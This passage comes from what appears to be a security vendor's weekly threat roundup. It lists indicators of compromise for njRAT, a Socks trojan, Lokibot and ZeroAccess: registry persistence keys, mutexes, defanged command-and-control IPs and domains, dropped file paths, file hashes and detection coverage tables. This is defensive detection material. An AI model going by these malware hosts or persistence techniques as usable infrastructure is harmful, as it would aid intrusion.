11246d210b2edc49c14b00f14791a22b5f2ec12c1be96ce90d5177769a489869 11c83400744d7f64516e1854772373f91b105e66169ba15d5d110f0948bed825 17ca554b2e2a1a6b9412cc2c3e29d6c95e27a24305e879beb1ec3ec6b504d526 1ae7050f136ee52bc82af58ea180ba449e47f1bfde4c27956906ac1ff1913998 25328cbd1c4325abcc27a6a1553fbfe029ca98b10747c2adc5ecee08eef77bc2 25e261c4a20575828b3344d872bd99725fceb952acecf524fa6c3c1267a2e729 2ca7fa29437a2caca2c10c4c347f73d8bb4fed5698a2f78c91b949420fd2b015 306e30cefb63944763afedf2f77f7c9d51d0bcda5d53068c5b832bee4e9bb7b4 31cf80b70149972f55f5064158359386cd1a1e8e3426cd1b9fa922ac994c47e7 3908a42cf0243c333fbd9d5cee753db2e8e44b8e26daabd0336ab3faca57136c 3f1a2e83de8d62377f9c1db5326cedff42b0b3ab6581dd1c8c3a4a52b9498ce9 43d34611fc97e74ee6d88b3b1fddbfd6b97fec6dae41208856e6e0cfbc921007 4453c2ac6b30f16a9560439c542dc42a17c723caab95e63289aa239017d002c1 4664d6a94aeca4dbdd5ec72453be28be2697546f4effc2579b6330b00942011a 519eab7ecc913297fa56b498685eb13e06a9375ba3cd7108057952639f8945bb 5295c963140c0b6022b1c9bb91401d2042ffb715d5a0af394546e788124b058d 5d53c88240b8ac76a3de5ba303bfa805f9730abc2827f149716c5a3ef9776fab 664aec540c5ad508b5b86c695ebd6e302cd67d7833abe56516365273f735a0b6 68fe7ccc046a6eb48d4bb9b6acf26ca7a22a7379fed0663e83f89492f4bc001a 76d7eb8843a1031e6498584e781934f6546b513658e345081e85f5c2ccee3459 794509058dd3ca5f5e6e1e775c24cd46573c7ed556184f3b67e28abd053167bc 7de6b27ba23da2c1d1ddfc54926b8a770a7da00908516e377c68140ebefa44d5 81bb7e47f2f07cae53dfa7a78ae94625bc49945a99a147b06da9b30f887981f0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-0iLtt596xc4/Xbxd9OD_MLI/AAAAAAAAC4E/lbAwLKlURXcph7hr2MAHuASaijhVndwZACLcBGAsYHQ/s1600/81bb7e47f2f07cae53dfa7a78ae94625bc49945a99a147b06da9b30f887981f0_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.njRAT-7363922-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: di ` | 21 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 21 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 21 \n`<HKCU>\\SOFTWARE\\E99E462D99AD204BDF7D672852A4E30A \nValue Name: [kl] ` | 21 \n`<HKCU>\\SOFTWARE\\E99E462D99AD204BDF7D672852A4E30A ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: e99e462d99ad204bdf7d672852a4e30a ` | 7 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: e99e462d99ad204bdf7d672852a4e30a ` | 7 \nMutexes | Occurrences \n---|--- \n`e99e462d99ad204bdf7d672852a4e30a` | 21 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]22[.]2[.]84` | 14 \n`104[.]22[.]3[.]84` | 9 \n`95[.]185[.]232[.]120` | 1 \n`98[.]124[.]119[.]29` | 1 \n`41[.]141[.]118[.]138` | 1 \n`197[.]26[.]141[.]153` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 21 \n`inforhack[.]ddns[.]net` | 3 \n`shadowhakar41[.]ddns[.]net` | 1 \n`osaam2015[.]ddns[.]net` | 1 \n`x5pqt[.]ddns[.]net` | 1 \n`server5319[.]us[.]to` | 1 \n`aqwe[.]ddns[.]net` | 1 \n`hx[.]ddns[.]net` | 1 \n`snokeall[.]ddns[.]net` | 1 \n`animeopening[.]ddns[.]net` | 1 \n`mrzero007[.]ddns[.]net` | 1 \n`sikipon32[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\dw.log` | 17 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 17 \n`%TEMP%\\svchost.exe` | 12 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\e99e462d99ad204bdf7d672852a4e30a.exe` | 6 \n`%APPDATA%\\svchost.exe` | 2 \n`%APPDATA%\\skype.exe` | 1 \n`%TEMP%\\8c0_appcompat.txt` | 1 \n`%HOMEPATH%\\svchost.exe` | 1 \n`%TEMP%\\dlhost.exe` | 1 \n`%HOMEPATH%\\Hex.exe` | 1 \n`%TEMP%\\Microsoft.exe` | 1 \n \n#### File Hashes\n\n` 059e82f8093d6cc96a0c9b256b91f29a76a504b31e7b99e505f00f1a58fb0fc8 0e456becd300e714371a779408d0e06c9e2d607e4e64357eddfa044a52c16640 2a167630a36ac40de7c8734db7020485e6437e48f7df33254702cdd8970128c0 51e4acbcc40cd882aaad099ae740e95657b309933898ba1d7008c457f0d75cdb 6001923be2f05f19e5061ddf5975f4b8c11f0085328434d6b1926c5a2c6485b9 6d377ec90f4ba0dd424381e05b48c7ed6e92dacc5e8ee3a154c4b770eeb52587 76c67ae939c6a9d187a0bdea6aaa6327984cd3e8de004835eb067ce4ec94ca1e 79fb56495974b83bc55b641f7a242206a539fcc028f66587f9e3c01e954f60b1 82af8835172e86cb143531abfaaf49ba71f5f82087c47bde81982e7f9fb4857a 836067675ad71d653ef9e8cedd07df5e6d15a41e7bc54cdbbaee2fc7764d9d2f 842865c8e038c4cf4da7c65a2c42379548009ddfedf206ac768f4fc443f3fae4 8c8ab50a5fffa135df8e2f8414a7862659dfec13742a511f9ca7f07348f3a44e 8df49f96d2f23b361c482dc331569827f4de5948cb95b426bf51c5f02d7574e5 92451c9eaec9049c6d787ec783bfacbaa20c4b95380b7247b540419c9b326a15 b56bdfb6b099cfe281a29e3d1f1a08d7fb4d56c0495dad8db010cb207ca73d67 ca1bc558e24135a5d6b79621ad7c236f6ca50c552bbc7b13d8b0d6feecf0a330 d788fe230c34a048d3a9b81464e72b62804447c046fc160ab920fda1ab168d56 e060f062be14913686fec255fae67e79f0042507701289fe8347d15206462df6 e4545c9397b09fa28bfd369bdc28babaee10ec05546bcd674263c0d24244aa07 f17ae58c267b7d0601014165e804580d0044134dc04b1ca50811275df0793ded f6d6b6fae736e1fc4d9bbb52704a7c84cc8bf4981f18ea466793f5aaf545d38a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-l8k4qj3npM4/XbxeNiQYypI/AAAAAAAAC4M/tQxxSJQSHo4W55rLQ90tVJ_3XG2MOPYsQCLcBGAsYHQ/s1600/ca1bc558e24135a5d6b79621ad7c236f6ca50c552bbc7b13d8b0d6feecf0a330_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Socks-7363151-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SCHEDULE \nValue Name: ImagePath ` | 24 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 24 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 24 \n`<HKLM>\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND ` | 24 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]100[.]26[.]251` | 24 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`fewfwe[.]net` | 24 \n`blinko-usa[.]com` | 24 \n`satellife[.]info` | 24 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\cftmon.exe` | 24 \n`%SystemRoot%\\SysWOW64\\drivers\\spools.exe` | 24 \n \n#### File Hashes\n\n` 0e9ce623b6d9979002c965f8d4b8379d16a3cdd71e64edfefb7b46546f760556 158b0aa2b4d23ab0c60e398eaffcc453d3b2135e9ac8501fc6fc8b0181f34916 19037ebfa382219b5a715a3190291091db8c4305cfcfb80ccf7ee6134f24ac2b 2c5f26e9971998e2989d69062df2b4947e52799f3b1e467eca922637cfc4b8a0 4772d7089ed885adeffe0c432f206e84a10038d93aea00713a0fef3ea204d61b 4ab819c524ad7e920bc7fedfce565676c6fdbc952e565bd42da7622456900f5b 4b39a3e4422ff108fbbeb5527524254eff540f48afcb882ef723c86760c01692 4d0b608d4816454ea7c615a51d24d20d25d3db7b424bea47956f3cf610c12a63 564cc6cf1fb9c7f23321ea597da0de78584f663faa3576cc25c876f0ced8539f 6451c75aa10348799759f004bb5f8cec4cab9ca59a243f74af6a92d994ff47ad 6bb0c35cf05218d0f843085b0da1dadead72bb6f3f08c72909c42875d177fac9 7299f47ff48a6286d1cd26a0b7d1e5233dd14af4cb7b1899538f9aa6661194ad 72ad21d29db21fd7519e226f0e50bd12a6c656b3ec14aed124555467373f09c4 748a55b6bb4144523e88a1a6795b22a445d30c142f06f869db1ea79ea879a6dd 8125c5f1f273ce5eafef48762c6886cb9df53a7dd5d41aad058afdab64256c9f 9814aae0363183ef5ae7d960da747db0dc5a644bae9e6f880c2b16f1b06f0de7 bbe846b00154658a2ce4701a08f085b806aebfebec60a5fc7b755bdb16f1db46 cec7f824501284e919c38d9161196136e527b67a8cb5066a2605995ec9833b94 cee25c0db7ab90aa3848e13013b2b02e82f101e473544ed802dc57242e54acfc cf8478480f7974884ce7a9d817b4ded724f2d1c77638273fbeaa3f086d1905ad d814df1c7a8edf3d4ce11091595ffd5d25b5a79de1891b39dc8ddfd8c00353c2 da967dec24f5455ed8910f3d7df93c60319fba735a29e2e09401db4b6b7a057c f713344d26bc5ad3d88efd93473acbbde824c4d4f0e1a70fb690d9bfe27a2bff f74c53738e554de22236498e91bef767351ac06a677eb2192ee09182eec203a4 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gJNzd81eKTo/XbxeeM_mPEI/AAAAAAAAC4U/YmK8GP1qIS0FA7fT8u_3EhaXVDGwsVnAQCLcBGAsYHQ/s1600/6451c75aa10348799759f004bb5f8cec4cab9ca59a243f74af6a92d994ff47ad_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Lokibot-7363866-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WINRAR ` | 3 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8PKXHTYXYR ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: KV1LBH_H1V ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: JPXX3LNHNHY ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: PHLL54I ` | 1 \nMutexes | Occurrences \n---|--- \n`3749282D282E1E80C56CAE5A` | 12 \n`3BA87BBD1CC40F3583D46680` | 11 \n`8-3503835SZBFHHZ` | 4 \n`6M1O492E903A660D` | 4 \n`S-1-5-21-2580483-1060168328224` | 2 \n`Global\\ee9ec621-fa96-11e9-a007-00501e3ae7b5` | 1 \n`S-1-5-21-2580483-6362420053499` | 1 \n`S-1-5-21-2580483-19562420053499` | 1 \n`S-1-5-21-2580483-13882420053499` | 1 \n`S-1-5-21-2580483-11682420053499` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]247[.]73[.]132` | 10 \n`62[.]149[.]128[.]45` | 2 \n`198[.]54[.]117[.]200` | 2 \n`47[.]91[.]169[.]15` | 2 \n`198[.]49[.]23[.]144/31` | 2 \n`172[.]80[.]15[.]9` | 2 \n`185[.]149[.]23[.]24` | 2 \n`45[.]43[.]35[.]96/31` | 2 \n`213[.]186[.]33[.]5` | 1 \n`50[.]63[.]202[.]52` | 1 \n`91[.]195[.]240[.]126` | 1 \n`23[.]20[.]239[.]12` | 1 \n`184[.]168[.]131[.]241` | 1 \n`52[.]58[.]78[.]16` | 1 \n`81[.]88[.]57[.]68` | 1 \n`183[.]90[.]245[.]41` | 1 \n`162[.]213[.]255[.]220` | 1 \n`162[.]211[.]181[.]225` | 1 \n`213[.]239[.]221[.]71` | 1 \n`198[.]54[.]117[.]218` | 1 \n`173[.]247[.]243[.]182` | 1 \n`203[.]238[.]182[.]106` | 1 \n`103[.]75[.]189[.]246` | 1 \n`77[.]72[.]0[.]138` | 1 \n`69[.]16[.]230[.]43` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`devhaevents[.]us` | 10 \n`www[.]nadidetadllar[.]com` | 3 \n`28080[.]com` | 2 \n`www[.]peizi33[.]com` | 2 \n`www[.]zgtmn[.]com` | 2 \n`www[.]neurofoodmarketing[.]com` | 2 \n`www[.]dc-eas[.]com` | 2 \n`www[.]wls11[.]com` | 2 \n`www[.]the-conference-buddies[.]com` | 2 \n`www[.]parapuglia[.]com` | 2 \n`www[.]wemovieblog[.]info` | 2 \n`www[.]browneyedbakerfun[.]com` | 2 \n`www[.]zjko2o[.]com` | 2 \n`www[.]cryptogage[.]com` | 2 \n`cn-list[.]info` | 2 \n`www[.]xn--u2u404a[.]ink` | 2 \n`www[.]stvple[.]com` | 2 \n`www[.]ledean-pauvert[.]com` | 2 \n`www[.]ms-field[.]net` | 2 \n`www[.]2zh4m[.]com` | 1 \n`www[.]66463dh[.]com` | 1 \n`www[.]moveoptimizer[.]com` | 1 \n`www[.]onmyoji-kouryaku[.]com` | 1 \n`www[.]1399pk10[.]com` | 1 \n`mindslaver[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D282E1\\1E80C5.lck` | 12 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 12 \n`%APPDATA%\\D1CC40\\0F3583.lck` | 11 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-1258710499-2222286471-4214075941-500\\a18ca4003deb042bbee7a40f15e1970b_8f793a96-da80-4751-83f9-b23d8b735fb1` | 11 \n`%TEMP%\\bill file.exe` | 11 \n`%APPDATA%\\D1CC40\\0F3583.exe (copy)` | 9 \n`%APPDATA%\\D282E1` | 7 \n`%APPDATA%\\6M1O492E\\6M1logim.jpeg` | 7 \n`%APPDATA%\\6M1O492E\\6M1logrc.ini` | 7 \n`%APPDATA%\\6M1O492E\\6M1logri.ini` | 7 \n`%APPDATA%\\D1CC40\\0F3583.hdb` | 5 \n`%APPDATA%\\6M1O492E\\6M1logrv.ini` | 4 \n`%System32%\\Tasks\\Attractableness` | 3 \n`%ProgramData%\\hellderbind.exe` | 3 \n`%ProgramData%\\HELLDE~1.EXE` | 2 \n`\\Documents and Settings\\All Users\\hellderbind.exe` | 2 \n`%SystemRoot%\\Tasks\\Attractableness.job` | 2 \n`%TEMP%\\A1ED.dmp` | 1 \n`%TEMP%\\8D7A.dmp` | 1 \n`%TEMP%\\bin.exe` | 1 \n`%APPDATA%\\-L951SVT\\-L9logim.jpeg` | 1 \n`%APPDATA%\\-L951SVT\\-L9logrc.ini` | 1 \n`%APPDATA%\\-L951SVT\\-L9logri.ini` | 1 \n`%TEMP%\\52843.bat` | 1 \n`%ProgramFiles(x86)%\\Dmdvpl4r8\\IconCacheebvhjrz.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0b1ec867f89cabea9e5a4750f7c7ba76ba255b417341b13351bde26733827d5e 124f01bbbcc20d33191c4d2bb756d7b4be9fd98b1c18dd0bafc2f5a1a0119a7c 1536d75683e29eb947bd08c622687c23e96b0a5b7192650d2c0e0b71b523f53b 3199c726488205e1e39d826666ddb14e567283dc1912b94688bf80623e3bb8b1 46d599a3253021c45a373cd9f324d1fe9b97a28a9b2ca57685621557296a736f 4a7483bd09d881a0c9b94077d2fa308eebcd44988dabf866b481c9dfd4d211da 68e514e18e7353c018dd48e6f237e5f7c57def18a357156ffca7dd3826ee7426 72b2e6a534b504d1e5871293956412bf8b198ae71139312592755bfe8a5cbfab 7a675a25cd30dc40dba8e32cbdc499089dcbc5a994150d8466497f14619ae6ba 8e89f43a20be6022d88e7ba6821a91e5f2ade5882ba8de7e86e449ba497e56cc c4294beaabec49ed4dede08037b48667ac91dbf9eb4cff60e987b1906d7e35f1 ca5eeac3a04231f26f71646ec3f62c867d42fef71dcd677cb4e2a01a986a80eb d0a46670613cb3711bb0c690f75768640e6867b53ee2866f1952bb3b39436f59 dbe53d918accbf4b75025ad3b525ebce8547c913808ef547e8b9d67114113b1c f966a33cbaba9b97cb874d8b8d17544c856db7544c7bb2a09d3d2535a8e28fd5 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-xCcGqnivNxQ/XbxewjTnGbI/AAAAAAAAC4c/WdI40J-Cu4AQ4_GC7FTbxcPKhUfX3uM1ACLcBGAsYHQ/s1600/46d599a3253021c45a373cd9f324d1fe9b97a28a9b2ca57685621557296a736f_amp.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-kK37vBh0HN0/Xbxe0w5yovI/AAAAAAAAC4g/bgJBe457GSQb6TElE8YyWN9LkCvWVV7HwCLcBGAsYHQ/s1600/46d599a3253021c45a373cd9f324d1fe9b97a28a9b2ca57685621557296a736f_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Zeroaccess-7358361-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 21 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: DeleteFlag ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: ErrorControl ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BFE \nValue Name: Type ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BFE \nValue Name: Start ` | 21 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BFE \nValue Name: ErrorControl ` | 21 \nMutexes | Occurrences \n---|--- \n`Global\\82f0e161-f7c1-11e9-a007-00501e3ae7b5` | 1 \n`Global\\a280e5c1-f7c1-11e9-a007-00501e3ae7b5` | 1 \n`Global\\d6367241-f7c1-11e9-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`83[.]133[.]123[.]20` | 14 \n`212[.]253[.]253[.]254` | 9 \n`218[.]144[.]173[.]167` | 8 \n`98[.]248[.]140[.]174` | 7 \n`76[.]119[.]18[.]160` | 6 \n`82[.]130[.]158[.]137` | 6 \n`24[.]222[.]83[.]135` | 6 \n`1[.]161[.]150[.]169` | 6 \n`65[.]36[.]75[.]132` | 6 \n`50[.]7[.]216[.]66` | 5 \n`166[.]82[.]93[.]190` | 5 \n`36[.]2[.]141[.]192` | 5 \n`184[.]90[.]23[.]168` | 4 \n`72[.]189[.]202[.]136` | 4 \n`37[.]19[.]241[.]169` | 4 \n`31[.]134[.]253[.]187` | 4 \n`110[.]226[.]47[.]156` | 4 \n`74[.]88[.]57[.]193` | 4 \n`184[.]38[.]240[.]175` | 4 \n`5[.]43[.]242[.]139` | 4 \n`152[.]7[.]6[.]164` | 4 \n`190[.]105[.]127[.]197` | 4 \n`98[.]69[.]146[.]176` | 4 \n`86[.]124[.]234[.]155` | 4 \n`80[.]116[.]95[.]189` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`j[.]maxmind[.]com` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 21 \n`\\@` | 21 \n`\\L\\eexoxfxs` | 21 \n`\\systemroot\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}` | 16 \n`\\systemroot\\system32\\services.exe` | 16 \n`%System32%\\services.exe` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\@` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\L` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\U` | 16 \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 5 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 5 \n`\\$Recycle.Bin\\S-1-5-18` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 5 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 3 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\n` | 3 \n`\\RECYCLER\\S-1-5-21-1258710499-2222286471-4214075941-500\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 3 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0698b0699a2832438d3d40b9b254a1db6997650030a4f1baa9d83b195ddcefee 2a4480ab660655f0667496d06a8a6c4ca40795ea673a1d8be36c185fcd5843a2 2ff6a5a8fb138d625121b218c791129fdac013f6cea1fc4cac9a8f986a43a17e 61fe63c712ac33630cca861ad8bc3283d9e591a61184cf0c2e40e1712880e858 68073e04dff2910046705b41823a3d2e22de0b80722b2e0642f8bbad2251f31b 6c0cfbb2a0f755be5e73f9eebf0af5a66a8a9ccd9f064742275c45911aa4ba05 73efae80e8a1433ecce908d9d89a7e0dee9689f9e41a43858b7dd020ad98bdbb 81af3ef292ab1ca88658434c67ba4433727b2fa52c6170689cc7e6987d52e994 82c17d05d449adc7970c6d923a00567228d2f92d784e17e46fd40fb5f75fc96c 852ca255c72851fff39129f7e4ad946e28c1c3adfe73f099d034b511d0d4f0ab 8bed5fd8ee4415d50e0fcfa15697455737ec30e371b9cf59998f16b9df82d655 8ff205742a2e987be8743877e3832f704a3d8a428adeaa809a62a2da3d98284f 90971a6f3936154d1d42143075a74343307211738f60fd8dc2704b9b1092b9eb 91b52463d52c11f45b8bc6e833560f374b3c23943ef83a596de4c9c263e25601 945e8db2a3e172c1b4def44a627f31ec3d92027c2302ae6ca8426995a0d2f330 97ab941d4e212453c834739eecc62dc6b23a2737b7e99fdfd5e5bc2b1e677070 97b0052c9b458793345d76e6a445608f464eb17c15a4a3e1ac62ecc2b5e19c70 9abab9e192eba949efed12bf34d82b796b872954a8928695c6c2eb539d7a9994 9b57296d2b3a6e2d71d279e2f72a0c5764076e60db0decd1c933cea1ec68abbd 9be01433e0553992428c321e8ddb794697837e4266ebfcde8957190f175300d0 9bef202996bca3127c622f5b26c98bbe35ae6ef0aeea22f071517a4545c5daac 9c0d8b542bc6d349355dc8bff3d9f3436ec63033777b6ae2b7350b82a31f0b64 9c73a69c0eec3b51b0ede9d6ffdb4079c8f8ecab122dace2625d32f5a81794b1 9f6076a9aeff4a57d098390ff61e60b6a954ee545b8945fca5d39f4907de0e84 a0c2956a0dd44d0e177af551a6b3c0990a6d163f2d8e36a1b4370c667bf7bdd2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### 